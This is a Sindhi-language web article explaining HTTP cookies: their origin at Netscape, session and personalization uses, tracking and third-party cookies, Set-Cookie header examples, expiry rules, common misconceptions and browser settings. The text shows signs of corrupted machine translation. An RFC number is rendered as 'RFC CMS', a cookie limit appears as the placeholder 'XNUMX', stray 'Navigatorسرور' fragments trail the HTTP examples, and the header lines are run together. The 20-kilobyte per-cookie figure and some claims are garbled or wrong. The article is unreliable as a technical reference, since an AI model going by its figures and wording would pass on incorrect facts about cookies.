in تعريف, رڪن

انٽرنيٽ ڪوڪيز: اهو ڇا آهي؟ وصف، اصل، قسم ۽ رازداري

ڪوڪيز جو ڪردار ڇا آهي، اهو ڇا آهي ۽ ڪوڪيز جا ڪهڙا قسم آهن؟ 🍪

56.3k ڏٺو ويو 384 ووٽ

انٽرنيٽ ڪوڪيز: اهو ڇا آهي؟ وصف، اصل، قسم ۽ رازداري
انٽرنيٽ ڪوڪيز: اهو ڇا آهي؟ وصف، اصل، قسم ۽ رازداري

Un ڪوڪيز يا ويب ڪوڪيز (يا ڪوڪي، مختصر طور تي شاھد ڪيوبيڪ ۾) HTTP ڪميونيڪيشن پروٽوڪول جي وضاحت ڪئي وئي آهي جيئن HTTP سرور طرفان HTTP ڪلائنٽ ڏانهن موڪليل معلومات جو هڪ تسلسل، جيڪو بعد ۾ هر وقت ساڳيو HTTP سرور کي ڪجهه حالتن ۾ پڇا ڳاڇا ڪري ٿو.

ڪوڪي هڪ جي برابر آهي ٽرمينل تي ذخيرو ٿيل ننڍڙي ٽيڪسٽ فائل انٽرنيٽ استعمال ڪندڙ جي. 20 سالن کان وڌيڪ عرصي تائين موجود آهن، اهي ويب سائيٽ ڊولپرز کي اجازت ڏين ٿا ته صارف ڊيٽا کي ذخيرو ڪرڻ لاء انهن جي نيويگيشن کي آسان ڪرڻ ۽ ڪجهه ڪارڪردگي جي اجازت ڏيڻ لاء. ڪوڪيز هميشه کان گهٽ يا وڌيڪ تڪراري رهيون آهن ڇو ته انهن ۾ باقي بچيل ذاتي معلومات آهي جيڪا ممڪن طور تي ٽئين پارٽين طرفان استعمال ڪري سگهجي ٿي.

اهو ويب سرور طرفان ويب برائوزر ڏانهن HTTP هيڊر جي طور تي موڪليو ويو آهي جيڪو هر دفعي سرور تائين پهچندي ان کي تبديل نه ڪندو آهي. ڪوڪيز کي استعمال ڪري سگهجي ٿو هڪ تصديق, هڪ سيشن (رياست جي سار سنڀال)، ۽ لاء استعمال ڪندڙ جي باري ۾ مخصوص معلومات ذخيرو، جهڙوڪ سائيٽ جي ترجيحات يا اليڪٽرانڪ شاپنگ ڪارٽ جو مواد. لفظ ڪوڪي مان نڪتل آهي جادو ڪوڪيز, UNIX ڪمپيوٽنگ ۾ هڪ مشهور تصور، جنهن برائوزر ڪوڪيز جو خيال ۽ نالو متاثر ڪيو. ڪوڪيز جا ڪجھ متبادل موجود آهن، هر هڪ پنهنجي پنهنجي استعمال، فائدن ۽ نقصانن سان.

سادي متن فائلون هجڻ ڪري، ڪوڪيز قابل عمل نه آهن. اهي نه آهن نه اسپائي ويئر ۽ نه ئي وائرس، جيتوڻيڪ ڪجھ سائيٽن مان ڪوڪيز ڪيترن ئي اينٽي وائرس سافٽ ويئر پاران ڳوليا ويندا آهن ڇاڪاڻ ته اهي صارفين کي ٽريڪ ڪرڻ جي اجازت ڏين ٿا جڏهن اهي گهڻن سائيٽن جو دورو ڪن ٿا. 

اڪثر جديد برائوزر صارفين کي اجازت ڏين ٿا فيصلو ڪيو ته ڪوڪيز کي قبول ڪرڻ يا رد ڪرڻ. استعمال ڪندڙ پڻ ڪري سگهن ٿا چونڊيو ڪيترو وقت تائين ڪوڪيز محفوظ ٿيل آهن. بهرحال، ڪوڪيز جو مڪمل رد ڪرڻ ڪجهه سائيٽن کي ناقابل استعمال بڻائي ٿو. مثال طور، اسٽور شاپنگ ڪارٽون يا سائيٽون جن کي لاگ ان جي ضرورت آهي سند استعمال ڪندي (يوزرنيم ۽ پاسورڊ).

مواد جو جدول

Historique

اصطلاح ڪوڪي انگريزي اصطلاح مان نڪتل آهي جادو ڪوڪيز، جيڪو ڊيٽا جو هڪ پيڪيٽ آهي جيڪو هڪ پروگرام وصول ڪري ٿو ۽ واپس موٽائي ٿو. ڪوڪيز اڳ ۾ ئي استعمال ڪيا ويا IT ۾ جڏهن لو مونٽولي انهن کي ويب ڪميونيڪيشن ۾ استعمال ڪرڻ جو خيال هو جون 1994 ۾. ان وقت، هو Netscape ڪميونيڪيشن پاران ملازم هو، جنهن هڪ ڪلائنٽ لاءِ هڪ اي ڪامرس ايپليڪيشن ٺاهي هئي. ڪوڪيز هڪ اسٽور جي مجازي شاپنگ ڪارٽ تي عمل درآمد جي اعتبار جي مسئلي جو حل ڏنو.

John Giannandrea ۽ Lou Montulli ساڳئي سال Netscape جي پهرين ڪوڪي جي وضاحت لکي. Mosaic Netscape جو نسخو 0.9 بيٽا، 13 آڪٽوبر 1994 تي جاري ڪيو ويو، ضم ٿيل ڪوڪي ٽيڪنالاجي (پوسٽ ڏسو). ڪوڪيز جو پهريون (غير تجرباتي) استعمال اهو طئي ڪرڻ لاءِ هو ته ڇا Netscape ويب سائيٽ تي ويندڙن ان کان اڳ سائيٽ جو دورو ڪيو هو. مونٽولي 1995 ۾ ڪوڪي ٽيڪنالاجي لاءِ پيٽنٽ جي درخواست داخل ڪئي، ۽ يو ايس پيٽنٽ 5774670 ڏني وئي. 1998 ۾ ڏني وئي.

Netscape 0.9 بيٽا ۾ 1994 ۾ لاڳو ٿيڻ کان پوء، ڪوڪيز کي انٽرنيٽ ايڪسپلورر 2 ۾ ضم ڪيو ويو، آڪٽوبر 1995 ۾ جاري ڪيو ويو.

ڪوڪيز جو تعارف اڃا تائين عام طور تي عام طور تي معلوم نه ڪيو ويو آهي. خاص طور تي، ڪوڪيز کي ڊفالٽ طور قبول ڪيو ويو برائوزر سيٽنگن ۾، ۽ صارفين کي انهن جي موجودگي جي خبر نه ڏني وئي. ڪجهه ماڻهن کي 1995 جي پهرين ٽه ماهي جي ڀرسان ڪوڪيز جي وجود جي خبر هئي، پر عام ماڻهن صرف ان جي وجود ۾ ورتو جڏهن فنانشل ٽائمز 12 فيبروري 1996 تي هڪ مضمون شايع ڪيو. ساڳئي سال، ڪوڪيز کي ميڊيا جي تمام گهڻي توجه حاصل ڪئي. ممڪن رازداري جي مداخلت جي ڪري. ڪوڪيز جو موضوع 1996 ۽ 1997 ۾ آمريڪي فيڊرل ٽريڊ ڪميشن جي ٻن مشاورتن ۾ بحث ڪيو ويو.

سرڪاري ڪوڪي وضاحت جي ترقي اڳ ۾ ئي جاري هئي. سرڪاري تفصيل جو پهريون بحث اپريل 1995 ۾ www-talk ميلنگ لسٽ تي ٿيو. هڪ خاص IETF ڪم ڪندڙ گروپ ٺاهي وئي. رياست کي HTTP ٽرانزيڪشن کي متعارف ڪرائڻ لاءِ ٻه متبادل تجويزون ترتيبوار برائن بيهلينڊرف ۽ ڊيوڊ ڪرسٽل پاران پيش ڪيون ويون، پر گروپ، پاڻ ڪرسٽول جي اڳواڻي ۾، ​​Netscape جي وضاحت کي شروعاتي نقطي طور استعمال ڪرڻ جو فيصلو ڪيو. فيبروري 1996 ۾، ڪم ڪندڙ گروپ اهو طئي ڪيو ته ٽئين پارٽي ڪوڪيز رازداري لاء هڪ اهم خطرو هو. گروپ پاران تيار ڪيل تفصيل آخرڪار شايع ڪيو ويو آر ايف سي سي ايم ايس.

2014 جي آخر کان، اسان ڪيترن ئي سائيٽن تي ڪوڪيز بابت بينر ڏسون ٿا. اتي گهٽ ۾ گهٽ هڪ برائوزر جي واڌ آهي جيڪا اجازت ڏئي ٿي بينر ظاهر نه ڪيو ويو آهي.

ڪوڪيز جا قسم ۽ استعمال

سيشن جو انتظام

ڪوڪيز استعمال ڪري سگھجن ٿيون صارف جي ڊيٽا کي نيويگيشن دوران برقرار رکڻ لاءِ، پر گھڻن دورون ۾ پڻ. ڪوڪيز متعارف ڪرايا ويا ته جيئن اليڪٽرانڪ شاپنگ ڪارٽس کي لاڳو ڪرڻ جو هڪ وسيلو، هڪ ورچوئل ڊيوائس جنهن ۾ صارف اهي شيون گڏ ڪري سگهي ٿو جيڪي هو خريد ڪرڻ چاهي ٿو سائيٽ کي برائوز ڪندي.

اڄڪلهه، ايپس جهڙوڪ شاپنگ ڪارٽون بدران هڪ سرور تي ڊيٽابيس ۾ شيون جي فهرست محفوظ ڪن ٿيون، جيڪو ترجيح آهي؛ انهن کي ڪوڪيز ۾ محفوظ ڪرڻ کان. ويب سرور هڪ ڪوڪي موڪلي ٿو جنهن ۾ هڪ منفرد سيشن ID شامل آهي. ويب برائوزر وري هن سيشن ID کي هر ايندڙ درخواست تي واپس ڪري ٿو ۽ ٽوڪري ۾ شيون محفوظ ڪيون ويون آهن ۽ انهي ساڳئي منفرد سيشن ID سان لاڳاپيل آهن.

ڪوڪيز جو بار بار استعمال سند استعمال ڪندي سائيٽ ۾ لاگ ان ٿيڻ لاءِ مفيد آهي. مختصر ۾، ويب سرور پهريون ڀيرو ڪوڪي موڪلي ٿو جنهن ۾ هڪ منفرد سيشن ID شامل آهي. پوءِ صارف پنهنجون سندون مهيا ڪن ٿا (عام طور تي صارف نالو ۽ پاسورڊ). ويب ايپليڪيشن وري سيشن جي تصديق ڪري ٿي ۽ صارف کي خدمت تائين رسائي جي اجازت ڏئي ٿي.

ذاتي

ڪوڪيز استعمال ڪري سگھجن ٿيون ڪنهن سائيٽ جي استعمال ڪندڙ جي معلومات کي ياد رکڻ لاءِ، انهي لاءِ ته جيئن کيس مستقبل ۾ مناسب مواد ڏيکاري سگهجي. مثال طور، هڪ ويب سرور هڪ ڪوڪي موڪلي سگهي ٿو جنهن ۾ استعمال ٿيل آخري يوزر نالو آهي جيڪو انهي ويب سائيٽ تي لاگ ان ٿيڻ لاءِ استعمال ڪيو ويو آهي، ته جيئن صارف جو نالو مستقبل جي دورن تي اڳي آباد ڪري سگهجي.

ڪيتريون ئي ويب سائيٽون صارف جي ترجيحن جي بنياد تي ذاتي ڪرڻ لاء ڪوڪيز استعمال ڪن ٿيون. صارفين پنهنجون ترجيحون فارم ۾ چونڊيندا آهن ۽ انهن کي سرور ڏانهن جمع ڪندا آهن. سرور ترجيحات کي ڪوڪيز ۾ انڪوڊ ڪري ٿو ۽ ان کي واپس برائوزر ڏانھن موڪلي ٿو. تنهن کان پوء، هر دفعي صارف هن سائيٽ جي صفحي تائين رسائي ڪري ٿو، برائوزر ڪوڪيز کي واپس ڪري ٿو ۽ انهي ڪري ترجيحن جي فهرست؛ سرور وري صارف جي ترجيحن جي مطابق صفحي کي ترتيب ڏئي سگھي ٿو. مثال طور، وڪيپيڊيا ويب سائيٽ پنهنجي استعمال ڪندڙن کي اجازت ڏئي ٿي ته هو پنهنجي پسند جي سائيٽ جي جلد کي منتخب ڪن. گوگل سرچ انجڻ پنهنجي استعمال ڪندڙن کي اجازت ڏئي ٿو (جيتوڻيڪ اهي رجسٽر ٿيل نه آهن) انهن نتيجن جو تعداد چونڊڻ جي لاءِ جيڪي هو هر نتيجن واري صفحي تي ڏسڻ چاهين ٿا.

ٽريڪنگ

ٽريڪنگ ڪوڪيز انٽرنيٽ استعمال ڪندڙن جي برائوزنگ عادتن کي ٽريڪ ڪرڻ لاءِ استعمال ٿينديون آهن. اهو پڻ جزوي طور تي ڪمپيوٽر جي IP پتي کي استعمال ڪندي هڪ صفحي لاءِ درخواست ڪندي يا 'ريفرر' HTTP هيڊر استعمال ڪندي ڪري سگهجي ٿو جيڪو ڪلائنٽ هر درخواست سان موڪليندو آهي، پر ڪوڪيز وڌيڪ سڌائي جي اجازت ڏين ٿيون. اهو هيٺين مثال ۾ ڪري سگهجي ٿو:

  1. جيڪڏهن صارف ڪنهن سائيٽ تي هڪ صفحي کي ڪال ڪري ٿو، ۽ درخواست ۾ ڪوڪي شامل نه آهي، سرور فرض ڪري ٿو ته اهو پهريون صفحو آهي جيڪو صارف پاران دورو ڪيو ويو آهي. سرور وري هڪ بي ترتيب واري تار ٺاهي ٿو ۽ ان کي برائوزر ڏانهن موڪلي ٿو درخواست ٿيل صفحي سان.
  2. هن وقت کان، ڪوڪيز خودڪار طريقي سان موڪلي ويندي برائوزر طرفان هر وقت سائيٽ جو هڪ نئون صفحو سڏيو ويندو. سرور هميشه وانگر صفحو موڪليندو، پر لاگ فائل ۾ صفحي جو URL، تاريخ، درخواست جو وقت ۽ ڪوڪي پڻ لاگ ان ڪندو.

لاگ فائل کي ڏسڻ سان، اهو ڏسڻ ممڪن آهي ته صارف ڪهڙن صفحن جو دورو ڪيو آهي ۽ ڪهڙي ترتيب ۾. مثال طور، جيڪڏهن فائل ۾ id=abc ڪوڪي استعمال ڪندي ڪجهه درخواستون شامل آهن، اهو قائم ڪري سگھي ٿو ته اهي سڀئي درخواستون هڪ ئي صارف کان اچن ٿيون. درخواست ڪيل URL، درخواستن سان لاڳاپيل تاريخ ۽ وقت صارف جي برائوزنگ کي ٽريڪ ڪرڻ جي اجازت ڏئي ٿو.

ٽئين پارٽي ڪوڪيز ۽ ويب بيڪنز، هيٺ وضاحت ڪئي وئي، اضافي طور تي مختلف سائيٽن تي ٽريڪنگ کي فعال ڪريو. سنگل سائيٽ ٽريڪنگ عام طور تي شمارياتي مقصدن لاءِ استعمال ٿيندي آهي. ان جي ابتڙ، ٽئين پارٽي ڪوڪيز استعمال ڪندي مختلف سائيٽن تي ٽريڪنگ عام طور تي اشتهاري ڪمپنيون استعمال ڪنديون آهن گمنام يوزر پروفائلز پيدا ڪرڻ لاءِ (جنهن کي پوءِ استعمال ڪيو ويندو آهي اهو طئي ڪرڻ لاءِ ته ڪهڙن اشتهارن کي صارف کي ڏيکاريو وڃي ۽ انهي سان گڏ هن کي انهن اشتهارن سان لاڳاپيل اي ميلون موڪلڻ لاءِ - SPAM ).

ٽريڪنگ ڪوڪيز صارف جي رازداري جي حملي جو خطرو آهي پر انهن کي آساني سان ختم ڪري سگهجي ٿو. اڪثر جديد برائوزرن ۾ ايپليڪيشن کي بند ڪرڻ وقت مستقل ڪوڪيز کي خودڪار طريقي سان ختم ڪرڻ جو اختيار شامل آهي.

ٽئين پارٽي ڪوڪيز

ويب پيج ۾ موجود تصويرون ۽ ٻيون شيون شايد سرور تي رهجي سگهن ٿيون جيڪي صفحي جي ميزباني ڪندڙ کان مختلف آهن. صفحي کي ڊسپلي ڪرڻ لاء، برائوزر انهن سڀني شين کي ڊائون لوڊ ڪري ٿو. گهڻيون ويب سائيٽون مختلف ذريعن کان معلومات تي مشتمل هونديون آهن. مثال طور، جيڪڏهن توهان ٽائيپ ڪريو ٿا www.example.com پنهنجي برائوزر ۾، ته اڪثر ڪري صفحي جي حصي تي شيون يا اشتهار هوندا جيڪي مختلف ذريعن کان ايندا آهن، يعني www. .example.com کان مختلف ڊومين مان. "پهريون" پارٽي ڪوڪيز ڪوڪيز آهن جيڪي ڊومين طرفان مقرر ڪيل آهن برائوزر جي ايڊريس بار ۾ درج ٿيل. ٽئين پارٽي ڪوڪيز هڪ صفحي جي شين مان سيٽ ڪيل آهن جيڪي مختلف ڊومين مان اچن ٿيون.

ڊفالٽ طور، برائوزرز جهڙوڪ Mozilla Firefox، Microsoft Internet Explorer ۽ Opera ٽئين پارٽي ڪوڪيز کي قبول ڪن ٿا، پر صارف انهن کي بلاڪ ڪرڻ لاءِ برائوزر اختيارن ۾ سيٽنگون تبديل ڪري سگھن ٿا. ٽئين پارٽي ڪوڪيز ۾ ڪو به حفاظتي خطرو موجود نه آهي جيڪي ويب ڪارڪردگي کي فعال ڪن ٿيون، جڏهن ته اهي استعمال ڪندڙن کي ٽريڪ ڪرڻ لاء پڻ استعمال ڪيا ويندا آهن. سائيٽ کان سائيٽ تائين.

اوزار جهڙوڪ Ghostery گوگل ڪروم سميت سڀني برائوزرن لاءِ دستياب آهن ٽئين پارٽين جي وچ ۾ مٽاسٽا کي بلاڪ ڪري سگهن ٿا.

عمل درآمد

ويب برائوزر ۽ ويب پيج جي ميزباني ڪندڙ سرور جي وچ ۾ ممڪن رابطو. سرور برائوزر ڏانهن ڪوڪي موڪلي ٿو ۽ برائوزر ان کي واپس موڪلي ٿو جڏهن اهو ٻئي صفحي کي سڏي ٿو.
ويب برائوزر ۽ ويب پيج جي ميزباني ڪندڙ سرور جي وچ ۾ ممڪن رابطو. سرور برائوزر ڏانهن ڪوڪي موڪلي ٿو ۽ برائوزر ان کي واپس موڪلي ٿو جڏهن اهو ٻئي صفحي کي سڏي ٿو.

ڪوڪيز ڊيٽا جا ننڍا ٽڪرا آهن جيڪي ويب سرور طرفان موڪليل برائوزر ڏانهن. برائوزر انهن کي سرور ڏانهن تبديل نه ڪيو، رياست متعارف ڪرايو (ماضي جي واقعن جي يادگيري) ٻي صورت ۾ بي رياست HTTP ٽرانزيڪشن ۾. ڪوڪيز جي بغير، ويب پيج جي هر ٻيهر حاصل ڪرڻ يا ويب پيج جو حصو هڪ الڳ واقعو آهي، ساڳئي سائيٽ تي ڪيل ٻين درخواستن کان آزاد. ويب سرور پاران سيٽ ڪرڻ جي قابل ٿيڻ کان علاوه، ڪوڪيز کي اسڪرپٽنگ ٻولين جهڙوڪ JavaScript، جيڪڏهن سپورٽ ۽ برائوزر طرفان اجازت ڏني وڃي ته سيٽ ڪري سگهجي ٿي.

سرڪاري ڪوڪيز جي وضاحت پيش ڪري ٿي ته برائوزرن کي گھٽ ۾ گھٽ ڪوڪيز کي محفوظ ڪرڻ ۽ ٻيهر موڪلڻ جي قابل ٿيڻ گھرجي. خاص طور تي، هڪ برائوزر کي گهٽ ۾ گهٽ 300 ڪوڪيز کي ذخيرو ڪرڻ جي قابل هجڻ گهرجي 20 ڪلو بائيٽ هر هڪ، ۽ گهٽ ۾ گهٽ XNUMX ڪوڪيز هڪ واحد سرور يا ڊومين لاءِ.

سيڪشن 3.1 جي مطابق آر ايف سي سي ايم ايس، ڪوڪيز جا نالا غير حساس آهن.

ڪوڪيز ان جي ختم ٿيڻ جي تاريخ بيان ڪري سگھي ٿي، ان صورت ۾ ڪوڪيز کي ختم ڪيو ويندو ھن تاريخ تي. جيڪڏهن ڪوڪي ختم ٿيڻ جي تاريخ نه ٻڌائي ٿي، ته ڪوڪي ڊهي ويندي آهي جيئن ئي صارف پنهنجو برائوزر ڇڏيندو. تنهن ڪري، ختم ٿيڻ جي تاريخ بيان ڪرڻ هڪ طريقو آهي ڪوڪيز کي ڪيترن ئي سيشنن ذريعي زندهه رکڻ جو. انهي سبب لاء، ڪوڪيز کي ختم ٿيڻ جي تاريخ سان چيو ويندو آهي لڳاتار. هڪ مثال ايپليڪيشن: پرچون سائيٽ شايد مسلسل ڪوڪيز استعمال ڪري سگھن ٿيون مسلسل ڪوڪيز کي رڪارڊ ڪرڻ لاءِ انهن شين کي رڪارڊ ڪرڻ لاءِ جيڪي صارفين پنهنجي شاپنگ ڪارٽ ۾ رکيا آهن (حقيقت ۾، ڪوڪي شايد هڪ داخلا جو حوالو ڏئي سگهي ٿي جيڪو وڪرو جي سائيٽ تي ڊيٽابيس ۾ محفوظ ٿيل آهي، ۽ نه توهان جي ڪمپيوٽر ۾) . ان جي ذريعي، جيڪڏهن صارف خريد ڪرڻ کان سواء پنهنجو برائوزر ڇڏيندا آهن ۽ بعد ۾ ان تي واپس ايندا، اهي شيون ٻيهر ڪارٽ ۾ ڳولي سگهندا. جيڪڏهن اهي ڪوڪيز ختم ٿيڻ جي تاريخ نه ڏنيون آهن، اهي ختم ٿي وينديون جڏهن برائوزر بند ڪيو ويندو، ۽ ٽوڪري جي مواد تي معلومات گم ٿي ويندي.

ڪوڪيز کي محدود ڪري سگهجي ٿو دائري ۾ هڪ مخصوص ڊومين، ذيلي ڊومين يا سرور تي رستو جيڪو انهن کي ٺاهيو آهي.

ويب صفحن جي منتقلي HyperText Transfer Protocol (HTTP) استعمال ڪندي ڪئي ويندي آهي. ڪوڪيز کي نظر انداز ڪرڻ سان، برائوزر ويب سرورز مان هڪ صفحي کي سڏين ٿا، عام طور تي انهن کي هڪ مختصر متن موڪليندا آهن HTTP درخواست. مثال طور، صفحي www.example.org/index.html تائين رسائي حاصل ڪرڻ لاءِ، برائوزر www.example.org سرور سان ڳنڍيندا آهن ۽ هڪ درخواست موڪليندا آهن جيڪي هن طرح نظر اچن ٿا:

GET /index.html HTTP/1.1 ميزبان: www.example.org
Navigatorسرور

سرور موڪلڻ سان جواب ڏئي ٿو درخواست ڪيل صفحي کي، اڳ ۾ هڪ ساڳئي متن سان، سڄي سڏيو وڃي ٿو HTTP جواب. هن پيڪٽ ۾ شايد لائينون هجن جيڪي برائوزر کي ڪوڪيز کي ذخيرو ڪرڻ جي هدايت ڪن ٿيون:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(HTML صفحو)
Navigatorسرور

سرور صرف سيٽ ڪوڪي لائن موڪلي ٿو، جيڪڏهن سرور چاهي ٿو ته برائوزر ڪوڪي کي ذخيرو ڪرڻ لاء. Set-Cookie براؤزر لاءِ گذارش آهي ته name=value string کي ذخيرو ڪري ۽ ان کي واپسي جي سڀني مستقبل جي درخواستن ۾ سرور ڏانهن. جيڪڏهن برائوزر ڪوڪيز کي سپورٽ ڪري ٿو ۽ ڪوڪيز کي برائوزر جي اختيارن ۾ فعال ڪيو ويو آهي، ڪوڪيز ساڳئي سرور تي ايندڙ سڀني درخواستن ۾ شامل ڪئي ويندي. مثال طور، برائوزر صفحي کي سڏي ٿو www.example.org/news.html هيٺ ڏنل درخواست موڪليندي سرور www.example.org:

GET /news.html HTTP/1.1 ميزبان: www.example.orgCookie: name=valueAccept: */*
Navigatorسرور

هي هڪ ٻئي صفحي لاءِ ساڳئي سرور کان درخواست آهي، ۽ مٿين پهرين کان مختلف آهي ڇو ته ان ۾ هڪ اسٽرنگ آهي جيڪو سرور اڳ ۾ برائوزر ڏانهن موڪليو هو. انهي جي مهرباني، سرور ڄاڻي ٿو ته هي درخواست اڳئين سان ڳنڍيل آهي. سرور سڏيل پيج موڪلڻ سان جواب ڏئي ٿو، ۽ ان ۾ ٻيون ڪوڪيز به شامل ڪندي.

ڪوڪي جو قدر سرور طرفان تبديل ڪري سگھجي ٿو هڪ نئين لائين موڪليندي Set-Cookie: name=new_value سڏايل صفحي جي جواب ۾. برائوزر وري پراڻي قدر کي نئين سان تبديل ڪري ٿو.

Set-Cookie لائن عام طور تي CGI پروگرام يا ٻي اسڪرپٽنگ ٻولي جي ذريعي ٺاهي ويندي آهي، نه HTTP سرور طرفان. HTTP سرور (مثال: Apache) صرف براؤزر ڏانهن پروگرام جو نتيجو (هيڊر کان اڳ ۾ ڪوڪيز تي مشتمل دستاويز) منتقل ڪندو.

ڪوڪيز جاوا اسڪرپٽ يا برائوزر ۾ هلندڙ ٻين ساڳين ٻولين ذريعي پڻ سيٽ ڪري سگھجن ٿيون، يعني سرور جي پاسي بدران ڪلائنٽ پاسي. JavaScript ۾، document.cookie اعتراض هن مقصد لاءِ استعمال ڪيو ويندو آهي. مثال طور، بيان document.cookie = "temperature=20" ڪوڪي ٺاهي ٿو "temperature" نالي سان ۽ 20 جي قدر سان.

google.com کان HTTP جواب جو مثال، جيڪو خاصيتن سان ڪوڪي سيٽ ڪري ٿو.
google.com کان HTTP جواب جو مثال، جيڪو خاصيتن سان ڪوڪي سيٽ ڪري ٿو.

نالي/قدر جي جوڙي کان علاوه، ڪوڪيز ۾ ختم ٿيڻ جي تاريخ، رستو، ڊومين جو نالو ۽ ڪنيڪشن جو قسم به شامل ٿي سگھي ٿو، يعني عام يا انڪريپٽ ٿيل. RFC 2965 پڻ وضاحت ڪري ٿو ته ڪوڪيز کي لازمي نسخو نمبر هجڻ گهرجي، پر اهو عام طور تي ختم ڪيو ويو آهي. اهي ڊيٽا حصا نالي جي پيروي ڪندا آهن = نئين_ قدر جوڙو ۽ سيميڪولن سان الڳ ٿيل آهن. مثال طور، سرور طرفان ڪوڪي ٺاهي سگھجي ٿو سيٽ-ڪوڪي لائن موڪلڻ سان: name=new_value; ختم ٿيڻ = تاريخ؛ رستو =/؛ domain=.example.org.

ڪوڪيز جو مدو ختم ٿي ويندو آهي ۽ پوءِ برائوزر طرفان نه موڪليا ويندا آهن سرور ڏانهن هيٺين حالتن ۾:

  • جڏهن برائوزر بند ڪيو ويندو آهي، جيڪڏهن ڪوڪي مسلسل نه آهي.
  • جڏهن ڪوڪيز جي ختم ٿيڻ جي تاريخ گذري وئي آهي.
  • جڏهن ڪوڪيز جي ختم ٿيڻ جي تاريخ تبديل ڪئي وئي آهي (سرور يا اسڪرپٽ طرفان) ماضي جي تاريخ ۾.
  • جڏهن برائوزر صارف جي درخواست تي ڪوڪيز کي حذف ڪري ٿو.

ٽئين صورتحال سرورز يا اسڪرپٽ کي اجازت ڏئي ٿي ته واضح طور تي ڪوڪيز کي حذف ڪري. نوٽ ڪريو ته اهو ممڪن آهي گوگل ڪروم ويب برائوزر سان ڪنهن خاص ڪوڪيز جي ختم ٿيڻ جي تاريخ معلوم ڪرڻ لاءِ مواد سيٽنگون تائين رسائي حاصل ڪندي. ڪمپيوٽر تي محفوظ ڪيل ڪوڪي شايد ڪيترن ئي ڏهاڪن تائين اتي رهي ٿي جيڪڏهن ان کي ختم ڪرڻ جو ڪو به طريقو نه ورتو وڃي.

اسٽيريوٽائپس

انٽرنيٽ تي انهن جي تعارف کان وٺي، ڪوڪيز بابت ڪيترائي خيال انٽرنيٽ ۽ ميڊيا ۾ گردش ڪيا ويا آهن. 1998 ۾، CIAC، آمريڪا جو ڊپارٽمينٽ آف انرجي ڪمپيوٽر واقعن مانيٽرنگ ٽيم، اهو طئي ڪيو ته ڪوڪيز جي حفاظتي خاميون ”لازمي طور تي غير موجود“ هيون ۽ وضاحت ڪئي ته ”توهان جي دورو جي اصليت ۽ انهن ويب صفحن جا تفصيل جيڪي توهان دورو ڪيا آهن. ويب سرورز جي لاگ فائلن ۾ اڳ ۾ ئي موجود آهي“. 2005 ۾، جپان ريسرچ هڪ مطالعي جا نتيجا شايع ڪيا، جنهن ۾ جواب ڏيڻ وارن جي هڪ اهم سيڪڙو هيٺين بيانن تي غور ڪيو:

  • ڪوڪيز وانگر آهن وائرس، اهي صارفين جي هارڊ ڊرائيو کي متاثر ڪن ٿا.
  • ڪوڪيز ٺاهي پاپ اپ.
  • ڪوڪيز موڪلڻ لاءِ استعمال ٿينديون آهن اسپام.
  • ڪوڪيز صرف اشتهارن لاءِ استعمال ٿينديون آهن.

ڪوڪيز استعمال ڪندڙ جي ڪمپيوٽر مان معلومات کي ختم يا پڙهي نه ٿيون سگهن. جڏهن ته، ڪوڪيز اهو ممڪن بڻائي ٿو ته ويب صفحن کي ڳولڻ لاء هڪ صارف طرفان ڏنل سائيٽ تي يا سائيٽن جي سيٽ تي. اها معلومات هڪ صارف جي پروفائل ۾ گڏ ڪري سگهجي ٿي جيڪا استعمال ڪري سگهجي ٿي يا ٽئين پارٽين کي ٻيهر وڪرو ڪري سگهجي ٿي، جيڪي سنگين رازداري مسئلا پيدا ڪري سگهن ٿيون. ڪجھ پروفائيل گمنام هوندا آهن، ان لحاظ کان ته انهن ۾ ڪا به ذاتي معلومات نه هوندي آهي، تڏهن به اهڙيون پروفائيلون قابل اعتراض ٿي سگهن ٿيون.

ساڳئي مطالعي جي مطابق، انٽرنيٽ استعمال ڪندڙن جو هڪ وڏو سيڪڙو نه ڄاڻن ٿا ته ڪوڪيز کي ڪيئن ختم ڪجي. ماڻهن جو ڪوڪيز تي ڀروسو نه ڪرڻ جو هڪ سبب اهو آهي ته ڪجهه سائيٽن ڪوڪيز جي ذاتي طور سڃاڻڻ واري پهلو کي غلط استعمال ڪيو آهي ۽ اها معلومات ٻين ذريعن سان شيئر ڪئي آهي. ھدف ٿيل اشتهارن ۽ اڻڄاتل اي ميل جو ھڪڙو وڏو سيڪڙو، اسپام سمجھي ٿو، معلومات مان اچي ٿو جيڪو ٽريڪنگ ڪوڪيز مان گڏ ڪيل آھي.

برائوزر سيٽنگون

گھڻا برائوزر ڪوڪيز کي سپورٽ ڪن ٿا ۽ صارف کي انھن کي غير فعال ڪرڻ جي اجازت ڏين ٿا. سڀ کان وڌيڪ عام اختيار آهن:

  • ڪوڪيز کي مڪمل طور تي فعال يا غير فعال ڪريو، انهي ڪري ته اهي مسلسل قبول يا بند ٿيل آهن.
  • برائوزر جي ايڊريس بار ۾ javascript: alert(document.cookie) داخل ڪندي استعمال ڪندڙ کي ڏنل صفحي ۾ فعال ڪوڪيز ڏسڻ جي اجازت ڏيو. ڪجھ برائوزر استعمال ڪندڙ لاءِ ڪوڪيز مئنيجر شامل ڪندا آھن جيڪو برائوزر طرفان في الحال محفوظ ڪيل ڪوڪيز کي ڏسي ۽ حذف ڪري سگھن ٿا.

گھڻا برائوزر ذاتي ڊيٽا کي مڪمل حذف ڪرڻ جي اجازت ڏين ٿا جن ۾ ڪوڪيز شامل آھن. ڪوڪيز جي اجازتن کي ڪنٽرول ڪرڻ لاءِ اضافي ماڊل پڻ موجود آهن.

رازداري ۽ ٽئين پارٽي ڪوڪيز

هن فرضي مثال ۾، هڪ اشتهاري ڪمپني ٻن ويب سائيٽن تي بينر رکيا آهن. ان جي سرورز تي بينر کي ميزباني ڪندي ۽ ٽئين پارٽي ڪوڪيز استعمال ڪندي، اشتهار سازي ڪمپني انهن ٻن سائيٽن ذريعي صارف جي نيويگيشن کي ٽريڪ ڪرڻ جي قابل آهي.

